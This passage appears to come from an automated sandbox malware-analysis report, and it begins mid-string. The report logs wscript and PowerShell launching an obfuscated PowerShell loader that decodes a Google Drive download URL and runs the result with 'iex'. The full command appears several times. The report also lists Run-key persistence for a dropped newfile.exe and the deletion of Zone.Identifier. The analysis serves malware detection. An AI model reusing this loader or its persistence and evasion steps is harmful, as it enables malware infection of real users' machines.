Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: newfile.exe.9.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.9.drStatic PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B890972 push E85E465Dh; ret 1_2_00007FFD9B8909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B963414 pushfd ; ret 1_2_00007FFD9B963415
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B966FE4 pushad ; ret 1_2_00007FFD9B966FE5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B967A4B push esi; ret 1_2_00007FFD9B967A4C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B967D14 push ebx; ret 1_2_00007FFD9B967D15
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_047C3405 push esp; retf 4_2_047C33E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_047C33D5 push esp; retf 4_2_047C33E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_073B08D8 push eax; mov dword ptr [esp], ecx4_2_073B0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_073B0AB9 push eax; mov dword ptr [esp], ecx4_2_073B0AC4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_0062376D push ecx; ret 10_2_00623780
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_006213F8 pushfd ; retf 10_2_006213F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\newfile\newfile.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
